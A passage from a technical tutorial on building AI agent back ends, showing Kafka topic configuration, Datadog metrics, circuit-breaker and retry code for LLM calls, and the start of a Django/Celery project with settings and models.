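from typing import Any, Dict, List


class EventLog:
    """Append-only log with an independent read offset per consumer group."""

    def __init__(self) -> None:
        self._records: List[Dict[str, Any]] = []
        self._offsets: Dict[str, int] = defaultdict(int)

    def append(self, event: Dict[str, Any]) -> int:
        """Append an event and return its offset."""
        self._records.append(event)
        return len(self._records) - 1

    def poll(self, group: str, max_records: int = 10) -> List[Dict[str, Any]]:
        """Return unread events for a group and advance that group's offset."""
        start = self._offsets[group]
        batch = self._records[start:start + max_records]
        self._offsets[group] = start + len(batch)
        return batch

    def seek(self, group: str, offset: int) -> None:
        """Move a group's offset, for example back to 0 to replay for an audit."""
        if not 0 <= offset <= len(self._records):
            raise ValueError("offset out of range")
        self._offsets[group] = offset


if __name__ == "__main__":
    log = EventLog()
    log.append({"event_type": "agent_request_received", "request_id": "r1"})
    log.append({"event_type": "agent_response_completed", "request_id": "r1"})

    print(len(log.poll("metrics")))  # the metrics group reads both events
    print(len(log.poll("audit")))    # the audit group reads them independently
    log.seek("metrics", 0)           # rewind and replay
    print(len(log.poll("metrics")))
```

Reading does not remove records, which is why a slow or restarted consumer does not affect producers or other groups. In a real cluster, replay is bounded by the topic's retention settings.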

Production Considerations:

  1. Kafka Topic Configuration:
python
# kafka_setup.py
from kafka.admin import KafkaAdminClient, NewTopic
import kafka.errors as errors

def setup_kafka_topics():
    admin_client = KafkaAdminClient(
        bootstrap_servers="localhost:9092",
        client_id="admin-client"
    )

    # Define topics with production-oriented configurations.
    # Note: replication_factor=3 needs at least three brokers, so these
    # settings will not work on the single-broker Docker Compose setup.
    topic_configs = [
        # Agent request topic - moderate throughput with ordered processing
        NewTopic(
            name="agent_requests",
            num_partitions=4,  # Balance parallelism and ordering
            replication_factor=3,  # High reliability for requests
            topic_configs={
                "retention.ms": str(7 * 24 * 60 * 60 * 1000),  # 7 days retention
                "cleanup.policy": "delete",
                "min.insync.replicas": "2",  # Ensure at least 2 replicas are in sync
                "unclean.leader.election.enable": "false",  # Prevent data loss
                "compression.type": "lz4"  # Efficient compression
            }
        ),

        # Agent response topic - higher throughput, less ordering dependency
        NewTopic(
            name="agent_responses",
            num_partitions=8,  # Higher parallelism for responses
            replication_factor=3,
            topic_configs={
                "retention.ms": str(7 * 24 * 60 * 60 * 1000),  # 7 days retention
                "cleanup.policy": "delete",
                "min.insync.replicas": "2",
                "compression.type": "lz4"
            }
        ),

        # System events topic - high volume, compacted for latest state.
        # Note: compacted topics reject records without a key, so producers
        # writing to this topic must set one (for example, the request ID).
        NewTopic(
            name="system_events",
            num_partitions=16,  # High parallelism for metrics and events
            replication_factor=3,
            topic_configs={
                "cleanup.policy": "compact,delete",  # Compact for state, delete for retention
                "delete.retention.ms": str(24 * 60 * 60 * 1000),  # Keep delete markers (tombstones) for 1 day
                "min.compaction.lag.ms": str(60 * 1000),  # 1 minute minimum time before compaction
                "segment.ms": str(6 * 60 * 60 * 1000),  # 6 hour segments
                "min.insync.replicas": "2",
                "compression.type": "lz4"
            }
        )
    ]

    # Create topics one at a time so an existing topic does not block the rest
    for topic in topic_configs:
        try:
            admin_client.create_topics([topic])
            print(f"Created topic: {topic.name}")
        except errors.TopicAlreadyExistsError:
            print(f"Topic already exists: {topic.name}")

    admin_client.close()

if __name__ == "__main__":
    setup_kafka_topics()
  2. Monitoring and Metrics:
python
# monitoring.py
import asyncio
import time
import json
from datadog import initialize, statsd
from functools import wraps
from contextlib import ContextDecorator

# Initialize Datadog client
initialize(statsd_host="localhost", statsd_port=8125)

class TimingMetric(ContextDecorator):
    """Context manager/decorator for timing operations and reporting to Datadog."""

    def __init__(self, metric_name, tags=None):
        self.metric_name = metric_name
        self.tags = tags or []
        self.start_time = None

    def __enter__(self):
        self.start_time = time.monotonic()
        return self

    def __exit__(self, exc_type, exc_val, exc_tb):
        duration = time.monotonic() - self.start_time
        # Convert to milliseconds
        duration_ms = duration * 1000

        # Send timing metric
        statsd.timing(self.metric_name, duration_ms, tags=self.tags)

        # Also send as gauge for easier aggregation
        statsd.gauge(f"{self.metric_name}.gauge", duration_ms, tags=self.tags)

        # If there was an exception, count it
        if exc_type is not None:
            statsd.increment(
                f"{self.metric_name}.error",
                tags=self.tags + [f"error_type:{exc_type.__name__}"]
            )

        # Don't suppress exceptions
        return False

def timing_decorator(metric_name, tags=None):
    """Function decorator for timing."""
    def decorator(func):
        @wraps(func)
        async def async_wrapper(*args, **kwargs):
            with TimingMetric(metric_name, tags):
                return await func(*args, **kwargs)

        @wraps(func)
        def sync_wrapper(*args, **kwargs):
            with TimingMetric(metric_name, tags):
                return func(*args, **kwargs)

        # Choose the appropriate wrapper based on whether the function is async
        return async_wrapper if asyncio.iscoroutinefunction(func) else sync_wrapper

    return decorator

62# Usage example with modified agent_worker function
63@timing_decorator("agent.request.processing", tags=["service:agent_worker"])
64async def process_agent_request(request_data):
65 # Implementation as before
66 request_id = request_data.get("request_id")
67 agent_type = request_data.get("agent_type", "general")
68
69 # Increment counter for request by agent type
70 statsd.increment("agent.request.count", tags=[
71 f"agent_type:{agent_type}",
72 f"priority:{request_data.get('priority', 'normal')}"
73 ])
74
75 # Original implementation continues...
76 # ...
77
78 # At the end, count completion
79 statsd.increment("agent.request.completed", tags=[
80 f"agent_type:{agent_type}",
81 f"status:success"
82 ])
83
84 return result
85
86# Kafka consumer with metrics
87async def consume_agent_responses():
88 consumer = AIOKafkaConsumer(
89 AGENT_RESPONSE_TOPIC,
90 bootstrap_servers=KAFKA_BOOTSTRAP_SERVERS,
91 group_id="agent-service-group",
92 value_deserializer=lambda m: json.loads(m.decode('utf-8')),
93 auto_offset_reset="latest",
94 enable_auto_commit=True
95 )
96
97 await consumer.start()
98
99 try:
100 async for message in consumer:
101 # Track consumer lag
102 lag = time.time() - message.timestamp/1000
103 statsd.gauge("kafka.consumer.lag_seconds", lag, tags=[
104 "topic:agent_responses",
105 "consumer_group:agent-service-group"
106 ])
107
108 # Process message with timing
109 with TimingMetric("kafka.message.processing", tags=["topic:agent_responses"]):
110 response_data = message.value
111 # Process as before...
112 # ...
113 finally:
114 await consumer.stop()
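
The timing pattern above can be tried without a running Datadog agent. The following is a minimal sketch, assuming an in-memory stand-in for the StatsD client. `RecordingStatsd` and `Timed` are hypothetical names introduced only for this illustration, and the real `datadog.statsd` client is not involved.

```python
import time
from contextlib import ContextDecorator


class RecordingStatsd:
    """In-memory stand-in for a StatsD client (hypothetical, illustration only)."""

    def __init__(self):
        self.calls = []

    def timing(self, metric, value, tags=None):
        self.calls.append(("timing", metric, tuple(tags or ())))

    def increment(self, metric, tags=None):
        self.calls.append(("increment", metric, tuple(tags or ())))


class Timed(ContextDecorator):
    """Times a block or function and reports to the injected client."""

    def __init__(self, client, metric_name, tags=None):
        self.client = client
        self.metric_name = metric_name
        self.tags = list(tags or [])

    def __enter__(self):
        self.start = time.monotonic()
        return self

    def __exit__(self, exc_type, exc_val, exc_tb):
        elapsed_ms = (time.monotonic() - self.start) * 1000
        self.client.timing(self.metric_name, elapsed_ms, tags=self.tags)
        if exc_type is not None:
            # Count the failure, tagged with the exception class name
            self.client.increment(
                f"{self.metric_name}.error",
                tags=self.tags + [f"error_type:{exc_type.__name__}"],
            )
        return False  # never swallow the exception


client = RecordingStatsd()


@Timed(client, "demo.work", tags=["service:demo"])
def work(fail=False):
    if fail:
        raise ValueError("boom")
    return "ok"


ok_result = work()
try:
    work(fail=True)
except ValueError:
    pass

for call in client.calls:
    print(call)
```

Injecting the client this way also makes the metric calls easy to assert on in unit tests, which is harder when the module-level `statsd` object is used directly.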
  1. Resilience and Circuit Breaking:
python
# resilience.py
import asyncio
import functools
import json
import os
import time
from datetime import datetime, timezone
from typing import Callable, Optional

import backoff
from aiokafka import AIOKafkaConsumer
from datadog import statsd
from fastapi import HTTPException
from openai import AsyncOpenAI

# AGENT_REQUEST_TOPIC, AGENT_RESPONSE_TOPIC, KAFKA_BOOTSTRAP_SERVERS and a started
# AIOKafkaProducer named `producer` are assumed to be defined alongside the rest
# of the service code.


# Circuit breaker implementation
class CircuitBreaker:
    def __init__(self, failure_threshold: int = 5, recovery_timeout: float = 30.0,
                 timeout: float = 10.0, fallback: Optional[Callable] = None):
        self.failure_threshold = failure_threshold
        self.recovery_timeout = recovery_timeout
        self.timeout = timeout
        self.fallback = fallback
        self.failure_count = 0
        self.last_failure_time = 0.0
        self.state = "CLOSED"  # CLOSED, OPEN, HALF-OPEN

    def __call__(self, func):
        @functools.wraps(func)
        async def async_wrapper(*args, **kwargs):
            return await self._handle_call(func, *args, **kwargs)

        @functools.wraps(func)
        def sync_wrapper(*args, **kwargs):
            return self._handle_sync_call(func, *args, **kwargs)

        return async_wrapper if asyncio.iscoroutinefunction(func) else sync_wrapper

    def _rejects_calls(self) -> bool:
        """Return True while the circuit is open; move to HALF-OPEN after the recovery timeout."""
        if self.state == "OPEN":
            if time.monotonic() - self.last_failure_time > self.recovery_timeout:
                # Move to half-open state and let one trial call through
                self.state = "HALF-OPEN"
            else:
                return True
        return False

    def _record_success(self):
        # A success closes the circuit and clears the consecutive-failure count
        self.failure_count = 0
        self.state = "CLOSED"

    def _record_failure(self):
        self.failure_count += 1
        self.last_failure_time = time.monotonic()
        # Open at the threshold, or immediately if the half-open trial call failed
        if self.state == "HALF-OPEN" or self.failure_count >= self.failure_threshold:
            self.state = "OPEN"

    async def _run_fallback(self, *args, **kwargs):
        if asyncio.iscoroutinefunction(self.fallback):
            return await self.fallback(*args, **kwargs)
        return self.fallback(*args, **kwargs)

    async def _handle_call(self, func, *args, **kwargs):
        if self._rejects_calls():
            # Circuit is open, use fallback or raise exception
            if self.fallback:
                return await self._run_fallback(*args, **kwargs)
            raise HTTPException(status_code=503, detail="Service temporarily unavailable")

        try:
            # Set timeout for the function call
            result = await asyncio.wait_for(func(*args, **kwargs), timeout=self.timeout)
        except Exception:
            self._record_failure()
            # Use fallback or re-raise the exception
            if self.fallback:
                return await self._run_fallback(*args, **kwargs)
            raise

        self._record_success()
        return result

    def _handle_sync_call(self, func, *args, **kwargs):
        if self._rejects_calls():
            if self.fallback:
                return self.fallback(*args, **kwargs)
            raise HTTPException(status_code=503, detail="Service temporarily unavailable")

        try:
            # For sync functions, we can't easily apply a timeout
            # Consider using concurrent.futures.ThreadPoolExecutor with timeout for sync functions
            result = func(*args, **kwargs)
        except Exception:
            self._record_failure()
            if self.fallback:
                return self.fallback(*args, **kwargs)
            raise

        self._record_success()
        return result


# Exponential backoff with jitter for retries
def backoff_llm_call(max_tries=5, max_time=30):
    def fallback_response(*args, **kwargs):
        return {
            "status": "degraded",
            "message": "Service temporarily in degraded mode. Please try again later."
        }

    # The breaker has no fallback of its own here: failures must surface as
    # exceptions, otherwise the retry layer would never see them.
    @backoff.on_exception(
        backoff.expo,
        Exception,  # Retry on any exception...
        max_tries=max_tries,
        max_time=max_time,
        jitter=backoff.full_jitter,
        # ...except the 503 raised while the circuit is open
        giveup=lambda e: isinstance(e, HTTPException),
        on_backoff=lambda details: print(
            f"Backing off {details['wait']:0.1f} seconds after {details['tries']} tries"
        )
    )
    @CircuitBreaker(failure_threshold=3, recovery_timeout=60.0, timeout=10.0)
    async def guarded_llm_call(client, prompt, model="gpt-4"):
        # This would be your actual LLM API call
        return await client.chat.completions.create(
            model=model,
            messages=[{"role": "user", "content": prompt}],
            max_tokens=1000
        )

    async def protected_llm_call(client, prompt, model="gpt-4"):
        try:
            return await guarded_llm_call(client, prompt, model=model)
        except Exception:
            # Retries exhausted or circuit open: degrade instead of failing
            return fallback_response()

    return protected_llm_call


# Example usage in agent implementation
async def agent_worker():
    consumer = AIOKafkaConsumer(
        AGENT_REQUEST_TOPIC,
        bootstrap_servers=KAFKA_BOOTSTRAP_SERVERS,
        group_id="agent-worker-group",
        value_deserializer=lambda m: json.loads(m.decode('utf-8')),
        auto_offset_reset="earliest",
        enable_auto_commit=True
    )

    await consumer.start()

    # Create OpenAI client
    client = AsyncOpenAI(api_key=os.environ.get("OPENAI_API_KEY"))

    # Create protected LLM call function with backoff and circuit breaker
    protected_llm = backoff_llm_call(max_tries=3, max_time=45)

    try:
        async for message in consumer:
            request_data = message.value
            request_id = request_data.get("request_id")

            start_time = time.monotonic()

            try:
                # Process with resilience patterns
                query = request_data.get("query")

                try:
                    # Make resilient LLM call
                    llm_response = await protected_llm(client, query)

                    # The fallback is a plain dict, not an API response object
                    if isinstance(llm_response, dict) and llm_response.get("status") == "degraded":
                        raise RuntimeError(llm_response["message"])

                    # Process response
                    response_content = llm_response.choices[0].message.content

                    # Send response
                    await producer.send_and_wait(
                        AGENT_RESPONSE_TOPIC,
                        {
                            "request_id": request_id,
                            "status": "success",
                            "response": response_content,
                            "processing_time": time.monotonic() - start_time,
                            "timestamp": datetime.now(timezone.utc).isoformat()
                        }
                    )

                except Exception as e:
                    # Handle failures with proper error reporting
                    await producer.send_and_wait(
                        AGENT_RESPONSE_TOPIC,
                        {
                            "request_id": request_id,
                            "status": "error",
                            "error": str(e),
                            "processing_time": time.monotonic() - start_time,
                            "timestamp": datetime.now(timezone.utc).isoformat()
                        }
                    )

                    # Also count the error for monitoring; request_id is left out
                    # of the tags to keep tag cardinality bounded
                    statsd.increment("agent.error", tags=[
                        f"error_type:{type(e).__name__}"
                    ])

            except Exception as e:
                # Catch-all exception handler to prevent worker crashes
                print(f"Critical error in message processing: {e}")

                # Log critical errors for immediate attention
                statsd.increment("agent.critical_error", tags=[
                    f"error_type:{type(e).__name__}"
                ])

    finally:
        await consumer.stop()
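
The state machine behind the circuit breaker is easier to follow in isolation. The sketch below is a deliberately reduced, synchronous version with an injectable clock so the CLOSED, OPEN, and HALF-OPEN transitions can be observed deterministically. `MiniBreaker` is a hypothetical class written for this illustration, not the `CircuitBreaker` above, and it omits timeouts and fallbacks.

```python
class MiniBreaker:
    """Minimal synchronous circuit breaker with an injectable clock (illustrative only)."""

    def __init__(self, failure_threshold, recovery_timeout, clock):
        self.failure_threshold = failure_threshold
        self.recovery_timeout = recovery_timeout
        self.clock = clock
        self.failure_count = 0
        self.opened_at = 0.0
        self.state = "CLOSED"

    def call(self, func):
        if self.state == "OPEN":
            if self.clock() - self.opened_at <= self.recovery_timeout:
                raise RuntimeError("circuit open")  # reject without calling func
            self.state = "HALF-OPEN"  # recovery window elapsed: allow one trial call
        try:
            result = func()
        except Exception:
            self.failure_count += 1
            if self.state == "HALF-OPEN" or self.failure_count >= self.failure_threshold:
                self.state = "OPEN"
                self.opened_at = self.clock()
            raise
        # Any success closes the circuit and clears the failure count
        self.failure_count = 0
        self.state = "CLOSED"
        return result


now = [0.0]  # fake clock, advanced by hand
breaker = MiniBreaker(failure_threshold=2, recovery_timeout=30.0, clock=lambda: now[0])


def failing():
    raise ValueError("upstream down")


states = []
for _ in range(2):
    try:
        breaker.call(failing)
    except ValueError:
        pass
    states.append(breaker.state)

try:
    breaker.call(lambda: "never runs")
except RuntimeError:
    states.append("rejected")

now[0] = 31.0  # step past the recovery timeout
recovered = breaker.call(lambda: "ok")
states.append(breaker.state)
print(states, recovered)
```

Passing the clock in as a parameter is a design choice for testability; production code would typically use `time.monotonic` directly.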

This stack is particularly well-suited for organizations that need to:

  • Process streaming data in real-time with AI analysis
  • Build responsive event-driven systems
  • Implement asynchronous request/response patterns
  • Support high-throughput messaging with reliable delivery
  • Maintain a flexible, decoupled architecture
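
The asynchronous request/response pattern mentioned above usually comes down to correlating messages on two topics by `request_id`. The following is a minimal sketch of that correlation, assuming `asyncio.Queue` objects as stand-ins for the request and response topics. The `worker`, `dispatcher`, and `ask` functions are hypothetical names for this illustration and no Kafka client is involved.

```python
import asyncio
import uuid


async def worker(requests: asyncio.Queue, responses: asyncio.Queue):
    """Stand-in for an agent worker: echoes each query back in upper case."""
    while True:
        msg = await requests.get()
        await responses.put(
            {"request_id": msg["request_id"], "response": msg["query"].upper()}
        )


async def dispatcher(responses: asyncio.Queue, pending: dict):
    """Resolve the future that is waiting on each response's request_id."""
    while True:
        msg = await responses.get()
        future = pending.pop(msg["request_id"], None)
        if future is not None and not future.done():
            future.set_result(msg["response"])


async def ask(query, requests, pending, timeout=1.0):
    """Publish a request and wait for the matching response."""
    request_id = str(uuid.uuid4())
    future = asyncio.get_running_loop().create_future()
    pending[request_id] = future
    await requests.put({"request_id": request_id, "query": query})
    try:
        return await asyncio.wait_for(future, timeout)
    finally:
        pending.pop(request_id, None)  # clean up on timeout as well


async def main():
    requests, responses, pending = asyncio.Queue(), asyncio.Queue(), {}
    tasks = [
        asyncio.create_task(worker(requests, responses)),
        asyncio.create_task(dispatcher(responses, pending)),
    ]
    try:
        return await asyncio.gather(
            ask("hello", requests, pending),
            ask("agents", requests, pending),
        )
    finally:
        for task in tasks:
            task.cancel()


answers = asyncio.run(main())
print(answers)
```

The timeout in `ask` matters in practice: without it, a lost or dropped response would leave the caller waiting indefinitely.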

Django/Flask + Celery + AutoGen + Pinecone (Task Orchestration & Search)

This stack is optimized for applications that require robust task management, background processing, and sophisticated search capabilities. It's particularly well-suited for document processing, content recommendation, and task-based AI workflows.

Architecture Overview:

Django + Celery + AutoGen Architecture

The architecture consists of:

  1. Django/Flask: Web framework for user interaction and API endpoints
  2. Celery: Distributed task queue for background processing
  3. Redis/RabbitMQ: Message broker for Celery tasks
  4. AutoGen: Multi-agent orchestration framework
  5. Pinecone: Vector database for semantic search
  6. PostgreSQL: Relational database for application data and task state

Implementation Example:

Let's implement a Django application with Celery tasks for AI agent processing:

First, the Django project structure:

text
project/
├── manage.py
├── requirements.txt
├── project/
│   ├── __init__.py
│   ├── settings.py
│   ├── urls.py
│   └── celery.py
├── agent_app/
│   ├── __init__.py
│   ├── admin.py
│   ├── apps.py
│   ├── models.py
│   ├── serializers.py
│   ├── tasks.py
│   ├── tests.py
│   ├── urls.py
│   ├── utils/
│   │   ├── __init__.py
│   │   ├── agent_factory.py
│   │   ├── pinecone_client.py
│   │   └── prompt_templates.py
│   └── views.py
└── templates/
    └── index.html

Now, let's implement the core components:

python
1# project/settings.py
2import os
3from pathlib import Path
4
5# Build paths inside the project like this: BASE_DIR / 'subdir'.
6BASE_DIR = Path(__file__).resolve().parent.parent
7
8# SECURITY WARNING: keep the secret key used in production secret!
9SECRET_KEY = os.environ.get('DJANGO_SECRET_KEY', 'django-insecure-key-for-dev')
10
11# SECURITY WARNING: don't run with debug turned on in production!
12DEBUG = os.environ.get('DJANGO_DEBUG', 'False') == 'True'
13
14ALLOWED_HOSTS = os.environ.get('DJANGO_ALLOWED_HOSTS', 'localhost,127.0.0.1').split(',')
15
16# Application definition
17INSTALLED_APPS = [
18 'django.contrib.admin',
19 'django.contrib.auth',
20 'django.contrib.contenttypes',
21 'django.contrib.sessions',
22 'django.contrib.messages',
23 'django.contrib.staticfiles',
24 'rest_framework',
25 'django_celery_results',
26 'django_celery_beat',
27 'agent_app',
28]
29
30MIDDLEWARE = [
31 'django.middleware.security.SecurityMiddleware',
32 'django.contrib.sessions.middleware.SessionMiddleware',
33 'django.middleware.common.CommonMiddleware',
34 'django.middleware.csrf.CsrfViewMiddleware',
35 'django.contrib.auth.middleware.AuthenticationMiddleware',
36 'django.contrib.messages.middleware.MessageMiddleware',
37 'django.middleware.clickjacking.XFrameOptionsMiddleware',
38]
39
40ROOT_URLCONF = 'project.urls'
41
42TEMPLATES = [
43 {
44 'BACKEND': 'django.template.backends.django.DjangoTemplates',
45 'DIRS': [BASE_DIR / 'templates'],
46 'APP_DIRS': True,
47 'OPTIONS': {
48 'context_processors': [
49 'django.template.context_processors.debug',
50 'django.template.context_processors.request',
51 'django.contrib.auth.context_processors.auth',
52 'django.contrib.messages.context_processors.messages',
53 ],
54 },
55 },
56]
57
58WSGI_APPLICATION = 'project.wsgi.application'
59
60# Database
61DATABASES = {
62 'default': {
63 'ENGINE': 'django.db.backends.postgresql',
64 'NAME': os.environ.get('POSTGRES_DB', 'agent_db'),
65 'USER': os.environ.get('POSTGRES_USER', 'postgres'),
66 'PASSWORD': os.environ.get('POSTGRES_PASSWORD', 'postgres'),
67 'HOST': os.environ.get('POSTGRES_HOST', 'localhost'),
68 'PORT': os.environ.get('POSTGRES_PORT', '5432'),
69 }
70}
71
72# Internationalization
73LANGUAGE_CODE = 'en-us'
74TIME_ZONE = 'UTC'
75USE_I18N = True
76USE_TZ = True
77
78# Static files (CSS, JavaScript, Images)
79STATIC_URL = 'static/'
80STATIC_ROOT = BASE_DIR / 'static'
81
82# Default primary key field type
83DEFAULT_AUTO_FIELD = 'django.db.models.BigAutoField'
84
85# Celery settings
86CELERY_BROKER_URL = os.environ.get('CELERY_BROKER_URL', 'redis://localhost:6379/0')
87CELERY_RESULT_BACKEND = 'django-db'
88CELERY_CACHE_BACKEND = 'django-cache'
89CELERY_ACCEPT_CONTENT = ['json']
90CELERY_TASK_SERIALIZER = 'json'
91CELERY_RESULT_SERIALIZER = 'json'
92CELERY_TIMEZONE = TIME_ZONE
93CELERY_TASK_TRACK_STARTED = True
94CELERY_TASK_TIME_LIMIT = 30 * 60 # 30 minutes
95CELERY_WORKER_CONCURRENCY = 8
96
97# REST Framework settings
98REST_FRAMEWORK = {
99 'DEFAULT_AUTHENTICATION_CLASSES': [
100 'rest_framework.authentication.SessionAuthentication',
101 'rest_framework.authentication.TokenAuthentication',
102 ],
103 'DEFAULT_PERMISSION_CLASSES': [
104 'rest_framework.permissions.IsAuthenticated',
105 ],
106 'DEFAULT_PAGINATION_CLASS': 'rest_framework.pagination.PageNumberPagination',
107 'PAGE_SIZE': 20
108}
109
110# AI Agent settings
111OPENAI_API_KEY = os.environ.get('OPENAI_API_KEY')
112PINECONE_API_KEY = os.environ.get('PINECONE_API_KEY')
113PINECONE_ENVIRONMENT = os.environ.get('PINECONE_ENVIRONMENT', 'us-west1-gcp')
114PINECONE_INDEX_NAME = os.environ.get('PINECONE_INDEX_NAME', 'agent-knowledge')
115
116# Logging configuration
117LOGGING = {
118 'version': 1,
119 'disable_existing_loggers': False,
120 'formatters': {
121 'verbose': {
122 'format': '{levelname} {asctime} {module} {process:d} {thread:d} {message}',
123 'style': '{',
124 },
125 'simple': {
126 'format': '{levelname} {message}',
127 'style': '{',
128 },
129 },
130 'handlers': {
131 'console': {
132 'level': 'INFO',
133 'class': 'logging.StreamHandler',
134 'formatter': 'verbose',
135 },
136 'file': {
137 'level': 'DEBUG',
138 'class': 'logging.FileHandler',
139 'filename': os.path.join(BASE_DIR, 'logs/django.log'),
140 'formatter': 'verbose',
141 },
142 },
143 'loggers': {
144 'django': {
145 'handlers': ['console', 'file'],
146 'level': 'INFO',
147 'propagate': True,
148 },
149 'agent_app': {
150 'handlers': ['console', 'file'],
151 'level': 'DEBUG',
152 'propagate': False,
153 },
154 },
155}
156
157# Create logs directory if it doesn't exist
158os.makedirs(os.path.join(BASE_DIR, 'logs'), exist_ok=True)
python
# project/celery.py
import os
from celery import Celery

# Set the default Django settings module
os.environ.setdefault('DJANGO_SETTINGS_MODULE', 'project.settings')

# Create the Celery app
app = Celery('project')

# Using a string here means the worker doesn't have to serialize
# the configuration object to child processes.
app.config_from_object('django.conf:settings', namespace='CELERY')

# Load task modules from all registered Django app configs.
app.autodiscover_tasks()

# Configure task routes
app.conf.task_routes = {
    'agent_app.tasks.process_agent_task': {'queue': 'agent_tasks'},
    'agent_app.tasks.update_knowledge_base': {'queue': 'knowledge_tasks'},
    'agent_app.tasks.analyze_document': {'queue': 'document_tasks'},
    'agent_app.tasks.periodic_agent_check': {'queue': 'scheduled_tasks'},
}

# Configure delivery and prioritization behavior:
# acknowledge a task only after it finishes, so a crashed worker's task is redelivered
app.conf.task_acks_late = True
# fetch one task at a time, so long-running agent tasks don't block queued ones
app.conf.worker_prefetch_multiplier = 1
# child tasks inherit the priority of the task that spawned them
app.conf.task_inherit_parent_priority = True


@app.task(bind=True)
def debug_task(self):
    print(f'Request: {self.request!r}')
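
One consequence of `task_routes` is worth spelling out: a task with no matching route goes to Celery's default queue, which is named `celery` unless `task_default_queue` is changed. The sketch below mimics that lookup in plain Python to show which queues the workers need to consume. It is not Celery's own router, and `resolve_queue` and `queues_to_consume` are hypothetical helpers for this illustration.

```python
TASK_ROUTES = {
    "agent_app.tasks.process_agent_task": {"queue": "agent_tasks"},
    "agent_app.tasks.update_knowledge_base": {"queue": "knowledge_tasks"},
    "agent_app.tasks.analyze_document": {"queue": "document_tasks"},
    "agent_app.tasks.periodic_agent_check": {"queue": "scheduled_tasks"},
}
DEFAULT_QUEUE = "celery"  # Celery's default queue name unless task_default_queue is set


def resolve_queue(task_name, routes=TASK_ROUTES, default=DEFAULT_QUEUE):
    """Return the queue a task would be sent to under an exact-name route table."""
    route = routes.get(task_name)
    return route["queue"] if route else default


def queues_to_consume(task_names):
    """Return the sorted set of queues that some worker has to listen on."""
    return sorted({resolve_queue(name) for name in task_names})


# debug_task is defined in project/celery.py and has no explicit route
registered = [*TASK_ROUTES, "project.celery.debug_task"]
needed = queues_to_consume(registered)
print(needed)
```

In this layout a worker started with only `-Q agent_tasks` would never pick up `debug_task`, so at least one worker should also consume the default queue.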
python
# project/urls.py
from django.contrib import admin
from django.urls import path, include

urlpatterns = [
    path('admin/', admin.site.urls),
    path('api/', include('agent_app.urls')),
]

Now let's define the agent app models:

python
1# agent_app/models.py
2import uuid
3from django.db import models
4from django.contrib.auth.models import User
5from django.utils import timezone
6
7class AgentTask(models.Model):
8 """Model for tracking agent tasks and their status."""
9 STATUS_CHOICES = (
10 ('pending', 'Pending'),
11 ('processing', 'Processing'),
12 ('completed', 'Completed'),
13 ('failed', 'Failed'),
14 ('canceled', 'Canceled'),
15 )
16 PRIORITY_CHOICES = (
17 (1, 'Low'),
18 (2, 'Normal'),
19 (3, 'High'),
20 (4, 'Urgent'),
21 )
22 TYPE_CHOICES = (
23 ('analysis', 'Data Analysis'),
24 ('research', 'Research'),
25 ('document', 'Document Processing'),
26 ('conversation', 'Conversation'),
27 ('generation', 'Content Generation'),
28 ('other', 'Other'),
29 )
30
31 id = models.UUIDField(primary_key=True, default=uuid.uuid4, editable=False)
32 user = models.ForeignKey(User, on_delete=models.CASCADE, related_name='agent_tasks')
33 title = models.CharField(max_length=255)
34 description = models.TextField()
35 task_type = models.CharField(max_length=20, choices=TYPE_CHOICES, default='other')
36 status = models.CharField(max_length=20, choices=STATUS_CHOICES, default='pending')
37 priority = models.IntegerField(choices=PRIORITY_CHOICES, default=2)
38
39 input_data = models.JSONField(default=dict, blank=True)
40 result_data = models.JSONField(default=dict, blank=True, null=True)
41 error_message = models.TextField(blank=True, null=True)
42
43 # Metadata
44 created_at = models.DateTimeField(auto_now_add=True)
45 updated_at = models.DateTimeField(auto_now=True)
46 started_at = models.DateTimeField(null=True, blank=True)
47 completed_at = models.DateTimeField(null=True, blank=True)
48
49 # Celery task ID for tracking
50 celery_task_id = models.CharField(max_length=255, blank=True, null=True)
51
52 # Token usage metrics
53 prompt_tokens = models.IntegerField(default=0)
54 completion_tokens = models.IntegerField(default=0)
55 total_tokens = models.IntegerField(default=0)
56 estimated_cost = models.DecimalField(max_digits=10, decimal_places=6, default=0)
57
58 class Meta:
59 ordering = ['-created_at']
60 indexes = [
61 models.Index(fields=['user', 'status']),
62 models.Index(fields=['task_type']),
63 models.Index(fields=['priority']),
64 ]
65
66 def __str__(self):
67 return f"{self.title} ({self.status})"
68
69 def set_processing(self, celery_task_id=None):
70 """Mark task as processing with the associated Celery task ID."""
71 self.status = 'processing'
72 self.started_at = timezone.now()
73 if celery_task_id:
74 self.celery_task_id = celery_task_id
75 self.save(update_fields=['status', 'started_at', 'celery_task_id', 'updated_at'])
76
77 def set_completed(self, result_data, token_usage=None):
78 """Mark task as completed with results and token usage."""
79 self.status = 'completed'
80 self.completed_at = timezone.now()
81 self.result_data = result_data
82
83 if token_usage:
84 self.prompt_tokens = token_usage.get('prompt_tokens', 0)
85 self.completion_tokens = token_usage.get('completion_tokens', 0)
86 self.total_tokens = token_usage.get('total_tokens', 0)
87 # Calculate estimated cost
88 prompt_cost = self.prompt_tokens * 0.0000015 # $0.0015 per 1000 tokens
89 completion_cost = self.completion_tokens * 0.000002 # $0.002 per 1000 tokens
90 self.estimated_cost = prompt_cost + completion_cost
91
92 self.save()
93
94 def set_failed(self, error_message):
95 """Mark task as failed with error message."""
96 self.status = 'failed'
97 self.error_message = error_message
98 self.completed_at = timezone.now()
99 self.save(update_fields=['status', 'error_message', 'completed_at', 'updated_at'])
100
101class KnowledgeItem(models.Model):
102 """Model for storing knowledge items for agent context."""
103 id = models.UUIDField(primary_key=True, default=uuid.uuid4, editable=False)
104 user = models.ForeignKey(User, on_delete=models.CASCADE, related_name='knowledge_items')
105 title = models.CharField(max_length=255)
106 content = models.TextField()
107
108 # Metadata for filtering and organization
109 source = models.CharField(max_length=255, blank=True)
110 domain = models.CharField(max_length=100, blank=True)
111 tags = models.JSONField(default=list, blank=True)
112
113 # Vector storage tracking
114 vector_id = models.CharField(max_length=255, blank=True, null=True)
115 embedding_model = models.CharField(max_length=100, default="text-embedding-ada-002")
116 last_updated = models.DateTimeField(auto_now=True)
117
118 # Quality metrics
119 relevance_score = models.FloatField(default=0.0)
120 confidence = models.FloatField(default=1.0)
121
122 created_at = models.DateTimeField(auto_now_add=True)
123
124 class Meta:
125 ordering = ['-created_at']
126 indexes = [
127 models.Index(fields=['user', 'domain']),
128 models.Index(fields=['vector_id']),
129 ]
130
131 def __str__(self):
132 return self.title
133
134class Conversation(models.Model):
135 """Model for tracking conversations between users and agents."""
136 id = models.UUIDField(primary_key=True, default=uuid.uuid4, editable=False)
137 user = models.ForeignKey(User, on_delete=models.CASCADE, related_name='conversations')
138 title = models.CharField(max_length=255, blank=True)
139 created_at = models.DateTimeField(auto_now_add=True)
140 updated_at = models.DateTimeField(auto_now=True)
